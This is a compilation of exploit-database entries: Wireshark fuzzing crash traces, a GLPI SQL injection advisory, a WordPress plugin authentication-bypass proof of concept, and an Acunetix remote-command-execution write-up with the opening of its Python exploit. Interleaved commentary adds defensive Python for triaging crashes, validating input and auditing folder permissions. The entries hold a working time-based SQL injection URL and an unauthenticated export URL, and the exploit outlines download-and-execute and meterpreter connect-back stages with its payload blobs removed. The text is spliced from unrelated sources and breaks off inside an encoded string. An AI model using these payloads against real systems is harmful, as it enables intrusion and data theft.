Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=806
The following crashes, caused by an out-of-bounds read of a static (global) array, can be observed in an ASAN build of Wireshark (current git master) by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==666==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fa5e68bd620 at pc 0x7fa5dc525eab bp 0x7ffd5938ec40 sp 0x7ffd5938ec38
READ of size 4 at 0x7fa5e68bd620 thread T0
#0 0x7fa5dc525eaa in dissect_zcl_pwr_prof_pwrprofnotif wireshark/epan/dissectors/packet-zbee-zcl-general.c:10832:25
#1 0x7fa5dc512afc in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:10549:21
#2 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#3 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#4 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#5 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#6 0x7fa5dc4f777c in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:881:13
#7 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#8 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#9 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#10 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#11 0x7fa5dc4d0d60 in dissect_zbee_apf wireshark/epan/dissectors/packet-zbee-aps.c:1705:9
#12 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#13 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#14 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#15 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#16 0x7fa5dc4d04fa in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1055:13
#17 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#18 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#19 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#20 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#21 0x7fa5dc4da910 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:732:9
#22 0x7fa5dc4d419a in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:762:9
#23 0x7fa5dc4d5fb7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:409:5
#24 0x7fa5d9d83bbb in dissector_try_heuristic wireshark/epan/packet.c:2390:7
#25 0x7fa5daf6591b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1524:21
#26 0x7fa5daf5756a in dissect_ieee802154_nofcs wireshark/epan/dissectors/packet-ieee802154.c:751:5
#27 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#28 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#29 0x7fa5d9d7ad4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
#30 0x7fa5dab8c105 in dissect_frame wireshark/epan/dissectors/packet-frame.c:492:11
#31 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#32 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#33 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#34 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#35 0x7fa5d9d75cd4 in dissect_record wireshark/epan/packet.c:539:3
#36 0x7fa5d9d28db9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
#37 0x52ef3f in process_packet wireshark/tshark.c:3727:5
#38 0x52830c in load_cap_file wireshark/tshark.c:3483:11
#39 0x51e67c in main wireshark/tshark.c:2192:13
0x7fa5e68bd620 is located 32 bytes to the left of global variable 'ett_zbee_zcl_appl_ctrl_func' defined in 'packet-zbee-zcl-general.c:11520:13' (0x7fa5e68bd640) of size 128
0x7fa5e68bd620 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:10389:13' (0x7fa5e68bd5e0) of size 64
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:10832:25 in dissect_zcl_pwr_prof_pwrprofnotif
==666==ABORTING
--- cut ---
--- cut ---
==695==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7feb11013620 at pc 0x7feb06c7b825 bp 0x7ffd6fe96b00 sp 0x7ffd6fe96af8
READ of size 4 at 0x7feb11013620 thread T0
#0 0x7feb06c7b824 in dissect_zcl_pwr_prof_enphsschednotif wireshark/epan/dissectors/packet-zbee-zcl-general.c:10745:25
#1 0x7feb06c68ba8 in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:10563:21
#2 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#3 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#4 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
#5 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#6 0x7feb06c4d77c in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:881:13
#7 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#8 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#9 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
#10 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#11 0x7feb06c26d60 in dissect_zbee_apf wireshark/epan/dissectors/packet-zbee-aps.c:1705:9
#12 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#13 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#14 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
#15 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#16 0x7feb06c264fa in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1055:13
#17 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#18 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#19 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
#20 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#21 0x7feb06c30910 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:732:9
#22 0x7feb06c2a19a in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:762:9
#23 0x7feb06c2bfb7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:409:5
#24 0x7feb044d9bbb in dissector_try_heuristic wireshark/epan/packet.c:2390:7
#25 0x7feb056bb91b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1524:21
#26 0x7feb056ad56a in dissect_ieee802154_nofcs wireshark/epan/dissectors/packet-ieee802154.c:751:5
#27 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#28 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#29 0x7feb044d0d4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
#30 0x7feb052e2105 in dissect_frame wireshark/epan/dissectors/packet-frame.c:492:11
#31 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#32 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#33 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
#34 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#35 0x7feb044cbcd4 in dissect_record wireshark/epan/packet.c:539:3
#36 0x7feb0447edb9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
#37 0x52ef3f in process_packet wireshark/tshark.c:3727:5
#38 0x52830c in load_cap_file wireshark/tshark.c:3483:11
#39 0x51e67c in main wireshark/tshark.c:2192:13
0x7feb11013620 is located 32 bytes to the left of global variable 'ett_zbee_zcl_appl_ctrl_func' defined in 'packet-zbee-zcl-general.c:11520:13' (0x7feb11013640) of size 128
0x7feb11013620 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:10389:13' (0x7feb110135e0) of size 64
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:10745:25 in dissect_zcl_pwr_prof_enphsschednotif
==695==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12358. Attached are two files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39750.zip
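Reading the two reports above: the faulting address is 0 bytes past the end of ett_zbee_zcl_pwr_prof_enphases, a 64-byte global read 4 bytes at a time, so the dissector touched element 16 of a 16-element array. The triage helper below is added here and is not part of the Project Zero report or of Wireshark; it parses an ASAN global-buffer-overflow report and computes that index, using a trimmed copy of the first report as its constructed sample.

```python
import re

# Constructed test input: the first ASAN report above, trimmed to the lines
# the parser needs (two stack frames instead of forty).
SAMPLE_REPORT = """\
==666==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fa5e68bd620 at pc 0x7fa5dc525eab bp 0x7ffd5938ec40 sp 0x7ffd5938ec38
READ of size 4 at 0x7fa5e68bd620 thread T0
    #0 0x7fa5dc525eaa in dissect_zcl_pwr_prof_pwrprofnotif wireshark/epan/dissectors/packet-zbee-zcl-general.c:10832:25
    #1 0x7fa5dc512afc in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:10549:21
0x7fa5e68bd620 is located 32 bytes to the left of global variable 'ett_zbee_zcl_appl_ctrl_func' defined in 'packet-zbee-zcl-general.c:11520:13' (0x7fa5e68bd640) of size 128
0x7fa5e68bd620 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:10389:13' (0x7fa5e68bd5e0) of size 64
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:10832:25 in dissect_zcl_pwr_prof_pwrprofnotif
"""

ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+) at (0x[0-9a-f]+)", re.M)
FRAME_RE = re.compile(r"^\s*#(\d+) 0x[0-9a-f]+ in (\S+) (\S+):(\d+):(\d+)\s*$", re.M)
GLOBAL_RE = re.compile(
    r"^(0x[0-9a-f]+) is located (\d+) bytes to the (left|right) of global variable "
    r"'([^']+)' defined in '([^']+)' \((0x[0-9a-f]+)\) of size (\d+)", re.M)


def parse_access(report):
    """The 'READ of size N at ADDR' line: what was accessed and how wide."""
    m = ACCESS_RE.search(report)
    if not m:
        raise ValueError("no READ/WRITE line found")
    return {"kind": m.group(1), "size": int(m.group(2)), "address": int(m.group(3), 16)}


def parse_frames(report):
    """Stack frames in order; frame #0 is the faulting dissector function."""
    return [{"index": int(n), "function": fn, "file": f, "line": int(l), "column": int(c)}
            for n, fn, f, l, c in FRAME_RE.findall(report)]


def parse_globals(report):
    """The 'is located N bytes to the left/right of global variable' lines."""
    out = []
    for _addr, dist, side, name, defined_in, base, size in GLOBAL_RE.findall(report):
        out.append({"name": name, "defined_in": defined_in, "side": side,
                    "distance": int(dist), "base": int(base, 16), "size": int(size)})
    return out


def triage(report):
    """Combine the three pieces of the report into one finding."""
    access = parse_access(report)
    frames = parse_frames(report)
    globs = parse_globals(report)
    if not frames or not globs:
        raise ValueError("report lacks a stack frame or a global-variable line")
    # ASAN prints the globals on both sides of the bad address; the overflowed
    # object is the nearest one, and on a tie a read past the end ("right") wins.
    target = min(globs, key=lambda g: (g["distance"], g["side"] != "right"))
    elem = access["size"]  # 4 here: the ett_ entries are 4-byte ints
    offset = access["address"] - target["base"]
    top = frames[0]
    return {
        "access": access["kind"],
        "access_size": elem,
        "function": top["function"],
        "location": "%s:%d:%d" % (top["file"], top["line"], top["column"]),
        "array": target["name"],
        "array_defined_in": target["defined_in"],
        "capacity": target["size"] // elem,
        "index": offset // elem,
        "past_end_bytes": offset - target["size"],
    }


def describe(report):
    r = triage(report)
    return ("%s of %d bytes in %s (%s) hits %s[%d], but the array holds %d "
            "elements (%d bytes past its end)" % (
                r["access"], r["access_size"], r["function"], r["location"],
                r["array"], r["index"], r["capacity"], r["past_end_bytes"]))


if __name__ == "__main__":
    print(describe(SAMPLE_REPORT))
```

The same parser applied to the second report gives index 16 of the same array from dissect_zcl_pwr_prof_enphsschednotif, which is why both crashes point at one missing bounds check on the subtree index.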
Advisory ID: HTB23301
Product: GLPI
Vendor: INDEPNET
Vulnerable Version(s): 0.90.2 and probably prior
Tested Version: 0.90.2
Advisory Publication: April 8, 2016 [without technical details]
Vendor Notification: April 8, 2016
Vendor Patch: April 11, 2016
Public Disclosure: April 29, 2016
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: High
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered a high-risk SQL injection vulnerability in GLPI, a popular Information Resource Manager (IRM) system. IRM systems are usually used to manage and audit software packages and to provide an ITIL-compliant service desk. The vulnerability allows a remote, unauthenticated attacker to execute arbitrary SQL queries, read and write data in the application's database and completely compromise the vulnerable system.
The vulnerability exists due to insufficient filtering of user-supplied data passed via the "page_limit" HTTP GET parameter to the "/ajax/getDropdownConnect.php" script. A remote unauthenticated attacker can alter the existing SQL query and inject and execute arbitrary SQL commands in the application's database.
Below is a simple SQL injection exploit that uses a time-based technique. The page load time will be significantly higher if the MySQL version is 5.X or later:
http://[host]/ajax/getDropdownConnect.php?fromtype=Computer&itemtype=Com
puter&page=1&page_limit=1%20PROCEDURE%20analyse%28%28select%20extractval
ue%28rand%28%29,concat%280x3a,%28IF%28MID%28version%28%29,1,1%29%20LIKE%
205,%20BENCHMARK%285000000,SHA1%281%29%29,1%29%29%29%29%29,1%29
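The root cause is that page_limit reaches the query as a string. The added Python below (my example, not GLPI's code) shows the fix direction, a strict integer validator feeding a parameterised LIMIT/OFFSET query (in-memory SQLite stands in for MySQL), and reuses the same validator as a detector over constructed access-log lines so requests like the one above stand out; the table and column names, the bounds and the log lines are assumptions.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/ajax/getDropdownConnect.php"
PAGE_LIMIT_MAX = 500   # assumed upper bound for one dropdown page
PAGE_MAX = 100000      # assumed upper bound for the page number
INT_RE = re.compile(r"[1-9][0-9]{0,6}")


def positive_int(raw, name, maximum, default):
    """Allow-list check: None/empty gives the default; anything but a bounded
    positive decimal integer raises, so no string ever reaches the SQL layer."""
    if raw is None or raw == "":
        return default
    if not isinstance(raw, str) or not INT_RE.fullmatch(raw):
        raise ValueError("%s must be a positive integer, got %r" % (name, raw))
    value = int(raw)
    if value > maximum:
        raise ValueError("%s exceeds %d: %d" % (name, maximum, value))
    return value


def build_query(params):
    """Hardened form: validated ints are bound as LIMIT/OFFSET parameters.
    The vulnerable pattern is string concatenation: "... LIMIT " + page_limit."""
    limit = positive_int(params.get("page_limit"), "page_limit", PAGE_LIMIT_MAX, 20)
    page = positive_int(params.get("page"), "page", PAGE_MAX, 1)
    sql = "SELECT id, name FROM glpi_computers ORDER BY name LIMIT ? OFFSET ?"
    return sql, (limit, (page - 1) * limit)


# Constructed rows standing in for the dropdown's backing table.
SAMPLE_ROWS = [(1, "alpha"), (2, "bravo"), (3, "charlie"), (4, "delta"), (5, "echo")]


def run_dropdown_query(params, rows=SAMPLE_ROWS):
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE glpi_computers (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO glpi_computers (id, name) VALUES (?, ?)", rows)
    sql, args = build_query(params)
    return conn.execute(sql, args).fetchall()


# Common Log Format: client, ident, user, [time], "METHOD target HTTP/x", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed access-log lines: one normal dropdown request, one carrying a
# non-numeric page_limit of the kind shown in the advisory, one unrelated page.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Apr/2016:10:00:01 +0000] "GET /ajax/getDropdownConnect.php'
    '?fromtype=Computer&itemtype=Computer&page=1&page_limit=20 HTTP/1.1" 200 512',
    '203.0.113.9 - - [29/Apr/2016:10:00:07 +0000] "GET /ajax/getDropdownConnect.php'
    '?fromtype=Computer&itemtype=Computer&page=1&page_limit=1%20PROCEDURE%20analyse HTTP/1.1" 200 512',
    '203.0.113.5 - - [29/Apr/2016:10:00:09 +0000] "GET /front/central.php HTTP/1.1" 200 8192',
]


def find_suspicious_requests(lines):
    """Apply the application's validator to logged requests: every page_limit
    the endpoint should have rejected is reported with its decoded value."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, when, _method, target, status = m.groups()
        url = urlsplit(target)
        if url.path != ENDPOINT:
            continue
        raw = parse_qs(url.query, keep_blank_values=True).get("page_limit", [None])[0]
        try:
            positive_int(raw, "page_limit", PAGE_LIMIT_MAX, 20)
        except ValueError as err:
            hits.append({"client": client, "time": when, "status": int(status),
                         "reason": str(err)})
    return hits


if __name__ == "__main__":
    print(run_dropdown_query({"page": "2", "page_limit": "2"}))
    for hit in find_suspicious_requests(SAMPLE_LOG):
        print(hit)
```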
-----------------------------------------------------------------------------------------------
Solution:
Update to GLPI 0.90.3
More Information:
http://www.glpi-project.org/spip.php?page=annonce&id_breve=358&lang=en
https://github.com/glpi-project/glpi/issues/581
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23301 - https://www.htbridge.com/advisory/HTB23301 - SQL Injection in GLPI.
[2] GLPI - http://www.glpi-project.org - GLPI is the Information Resource Manager with an additional Administration Interface.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
# Exploit Title: WordPress Export to Ghost Unrestricted Export Download
# Date: 28-04-2016
# Software Link: https://wordpress.org/plugins/ghost
# Exploit Author: Josh Brody
# Contact: http://twitter.com/joshmn
# Website: http://josh.mn/
# Category: webapps
1. Description
Any visitor can download the Ghost Export file because of a failure to check if an admin user is properly authenticated. Assume all versions < 0.5.6 are vulnerable.
2. Proof of Concept
http://example.com/wp-admin/tools.php?ghostexport=true&submit=Download+Ghost+file
The file will be downloaded.
3. Solution:
Update to version 0.5.6
https://downloads.wordpress.org/plugin/ghost.0.5.6.zip
'''
Acunetix WVS 10 - Remote command execution (SYSTEM privilege)
- Author: Daniele Linguaglossa
Overview
=========
Acunetix WVS 10 [1] is an enterprise web vulnerability scanner developed by Acunetix Inc.
Two major flaws exist in the latest version of Acunetix; these bugs allow a remote attacker
to execute commands in the context of the application with SYSTEM privileges.
Details
==========
The first flaw exists in the way Acunetix renders some HTML elements inside its GUI: it
uses jscript.dll without any restriction on unsafe ActiveX objects such as WScript.Shell.
If Acunetix triggers a vulnerability during a scan session it saves a local HTML file with the
content of the page, so it is possible to trigger a fake vulnerability and insert JavaScript
which triggers the remote command execution.
The second flaw concerns the Acunetix scheduler [2]. The scheduler allows websites to be
scanned programmatically without any user interaction; scans can be scheduled
via the web interface on 127.0.0.1:8183.
Like any Acunetix scan, it performs some tests on the targeted host before the real scan;
these tests are executed from scripts in the folder
C:\ProgramData\Acunetix WVS 10\Data\Scripts
icacls shows bad permissions on this folder, so any user (even Guest) is able to
replace these custom checks with their own (remember the first flaw with jscript.dll) :D
C:\ProgramData\Acunetix WVS 10\Data>icacls Scripts
Scripts Everyone:(OI)(CI)(M)
Everyone:(I)(OI)(CI)(M)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA) <---- UNSAFE [3]
Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
C:\ProgramData\Acunetix WVS 10\Data>
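To check a host for the weak ACL shown in that listing, here is an added Python helper (not the author's exploit and not Acunetix code) that parses captured icacls output and reports ACEs granting write rights to low-privilege principals; the sample is the listing above, and the principal list and right sets are assumptions (English account names, a path without spaces on the first line, as when icacls is run from the parent directory).

```python
import re

# Constructed sample: the icacls listing from the advisory above, as captured
# from "icacls Scripts" (the localized summary line is left in on purpose).
SAMPLE_ICACLS = """\
Scripts Everyone:(OI)(CI)(M)
        Everyone:(I)(OI)(CI)(M)
        NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)
        BUILTIN\\Administrators:(I)(OI)(CI)(F)
        CREATOR OWNER:(I)(OI)(CI)(IO)(F)
        BUILTIN\\Users:(I)(OI)(CI)(RX)
        BUILTIN\\Users:(I)(CI)(WD,AD,WEA,WA)
Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
"""

# icacls markers that describe inheritance rather than a right.
INHERITANCE_FLAGS = {"OI", "CI", "IO", "NP", "I"}
# Simple rights (F, M, W) and specific rights that let the holder create,
# replace or alter files; WD/AD are "write data / append data" in icacls terms.
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD", "AD", "WEA", "WA",
                "DE", "DC", "WDAC", "WO"}
# Principals any local user (or an anonymous network peer) can act as.
# Assumed list; a localized Windows prints translated names.
LOW_PRIV_PRINCIPALS = {
    "Everyone", "BUILTIN\\Users", "BUILTIN\\Guests",
    "NT AUTHORITY\\Authenticated Users", "NT AUTHORITY\\ANONYMOUS LOGON",
    "NT AUTHORITY\\INTERACTIVE",
}

# First line carries the path, then the first ACE; later lines are indented.
FIRST_LINE_RE = re.compile(r"^(\S+)\s+(.+?):((?:\([^)]*\))+)\s*$")
ACE_LINE_RE = re.compile(r"^\s+(.+?):((?:\([^)]*\))+)\s*$")


def _ace(principal, flag_text):
    """Split '(I)(CI)(WD,AD,WEA,WA)' into inheritance markers and rights."""
    groups = re.findall(r"\(([^)]*)\)", flag_text)
    qualifiers = {g for g in groups if g in INHERITANCE_FLAGS or g == "DENY"}
    rights = set()
    for g in groups:
        if g not in qualifiers:
            rights.update(r.strip() for r in g.split(","))
    return {"principal": principal, "rights": rights,
            "deny": "DENY" in qualifiers, "inherited": "I" in qualifiers,
            "propagates": bool(qualifiers & {"OI", "CI"})}


def parse_icacls(text):
    """Return (path, [ace, ...]); lines that are not ACEs (the summary) are skipped."""
    path, aces = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[0].isspace():
            m = ACE_LINE_RE.match(line)
            if not m:
                continue
            principal, flags = m.groups()
        else:
            m = FIRST_LINE_RE.match(line)
            if not m:
                continue
            path, principal, flags = m.groups()
        aces.append(_ace(principal.strip(), flags))
    return path, aces


def find_low_priv_write_aces(text):
    """ACEs that let a low-privilege principal add or modify files here."""
    _, aces = parse_icacls(text)
    return [a for a in aces
            if not a["deny"] and a["principal"] in LOW_PRIV_PRINCIPALS
            and a["rights"] & WRITE_RIGHTS]


def report(text):
    path, _ = parse_icacls(text)
    lines = []
    for a in find_low_priv_write_aces(text):
        lines.append("%s: %s has %s%s" % (
            path, a["principal"], ",".join(sorted(a["rights"])),
            " (inherited)" if a["inherited"] else ""))
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE_ICACLS):
        print(line)
```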
With these two flaws in mind I wrote a small exploit which is able to obtain RCE via
a meterpreter shell; there are some requirements:
1) Target must have VBS script interpreter
2) Target must have the scheduler service
3) Target must be Windows
Exploit
==========
https://github.com/dzonerzy/acunetix_0day
https://www.youtube.com/watch?v=gWcRlam59Fs (video proof)
Solution
==========
JScript should be used with limited ActiveX, and the permissions on C:\ProgramData\Acunetix WVS 10\Data
must be fixed!
Footnotes
_________
[1] http://www.acunetix.com/
[2] http://www.acunetix.com/support/docs/wvs/scheduling-scans/
[3] https://support.microsoft.com/it-it/kb/919240
'''
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Acunetix 0day SYSTEM Remote Command Execution by Daniele Linguaglossa
This PoC exploits two vulnerabilities in the Acunetix core: the first is an RCE (Remote Command Execution) and the second is
an LPE (Local Privilege Escalation).
All credits for this exploit go to Daniele Linguaglossa
"""
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from random import randint
from threading import Thread
from time import sleep
import binascii
import sys
import base64
import os
server = None
def gen_random_name(size):
alphabet = "abcdefghilmnopqrstuvzABCDEFGHILMNOPQRSTUVZ0123456789"
name = ""
for i in range(0, size):
name += alphabet[randint(0, len(alphabet) - 1)]
return name + ".vbs"
def ip2b(ip):
return "".join(binascii.hexlify(chr(int(t))) for t in ip.split("."))
def postexploitation():
print "[*] Sleeping 70 seconds to elevate privileges...ZzZz"
sleep(70) # 70 seconds
global server
print "[!] Stopping server !"
server.shutdown()
print "[!] Exploit successful wait for session!"
# param URL,FILENAME
PAYLOAD_DOWNLOAD_EXEC = ""  # [base64-encoded payload blob removed]
# param connect back IP
PAYLOAD_METERPETRER = ""  # [hex-encoded binary payload blob removed]
# param CMD => PAYLOAD_DOWNLOAD_EXEC
EXPLOIT_STAGE_1 = ""  # [base64-encoded payload blob removed]
LOGIN_FORM = ""  # [base64-encoded blob removed; the original page is truncated at this point]
"T0idGV4dCJdOmZvY3Vzew0KICBib3JkZXI6IDJweCBzb2xpZCAjMWFiYzlkDQp9DQoNCmlucHV0W3R5cGU9InN1Ym1pdCJdew0KICBk" \
"aXNwbGF5OiBibG9jazsNCiAgYmFja2dyb3VuZDogIzFhYmM5ZDsNCiAgd2lkdGg6IDMxNHB4Ow0KICBwYWRkaW5nOiAxMnB4Ow0KICB" \
"jdXJzb3I6IHBvaW50ZXI7DQogIGNvbG9yOiAjZmZmOw0KICBib3JkZXI6IDBweDsNCiAgbWFyZ2luOiBhdXRvOw0KICBib3JkZXItcm" \
"FkaXVzOiA1cHg7DQogIC1tb3otYm9yZGVyLXJhZGl1czogNXB4Ow0KICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDVweDsNCiAgZm9u" \
"dC1zaXplOiAxN3B4Ow0KICB0cmFuc2l0aW9uOiBhbGwgMC4zcyBlYXNlOw0KfQ0KDQppbnB1dFt0eXBlPSJzdWJtaXQiXTpob3ZlcnsN" \
"CiAgYmFja2dyb3VuZDogIzA5Y2NhNg0KfQ0KDQphew0KICB0ZXh0LWFsaWduOiBjZW50ZXI7DQogIGZvbnQtZmFtaWx5OiBBcmlhbDs" \
"NCiAgY29sb3I6IGdyYXk7DQogIGRpc3BsYXk6IGJsb2NrOw0KICBtYXJnaW46IDE1cHggYXV0bzsNCiAgdGV4dC1kZWNvcmF0aW9uOi" \
"Bub25lOw0KICB0cmFuc2l0aW9uOiBhbGwgMC4zcyBlYXNlOw0KICBmb250LXNpemU6IDEycHg7DQp9DQoNCmE6aG92ZXJ7DQogIGNvb" \
"G9yOiAjMWFiYzlkOw0KfQ0KDQoNCjo6LXdlYmtpdC1pbnB1dC1wbGFjZWhvbGRlciB7DQogICBjb2xvcjogZ3JheTsNCn0NCg0KOi1" \
"tb3otcGxhY2Vob2xkZXIgeyAvKiBGaXJlZm94IDE4LSAqLw0KICAgY29sb3I6IGdyYXk7ICANCn0NCg0KOjotbW96LXBsYWNlaG9sZG" \
"VyIHsgIC8qIEZpcmVmb3ggMTkrICovDQogICBjb2xvcjogZ3JheTsgIA0KfQ0KDQo6LW1zLWlucHV0LXBsYWNlaG9sZGVyIHsgIA0KI" \
"CAgY29sb3I6IGdyYXk7ICANCn0NCjwvc3R5bGU+DQo8aDE+QWRtaW4gcGFuZWw8L2gxPg0KPGRpdiBjbGFzcz0ic3RhbmQiPg0KICA8" \
"ZGl2IGNsYXNzPSJvdXRlci1zY3JlZW4iPg0KICAgIDxkaXYgY2xhc3M9ImlubmVyLXNjcmVlbiI+DQogICAgICA8ZGl2IGNsYXNzPSJ" \
"mb3JtIj4NCiAgICAgIDxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSIvbG9naW4iPg0KICAgICAgICA8aW5wdXQgdHlwZT0idGV4dC" \
"IgbmFtZT0idXNyIiBwbGFjZWhvbGRlcj0iVXNlcm5hbWUiIC8+DQogICAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwd2QiI" \
"HBsYWNlaG9sZGVyPSJQYXNzd29yZCIgLz4NCiAgICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJMb2dpbiIgLz4NCiAg" \
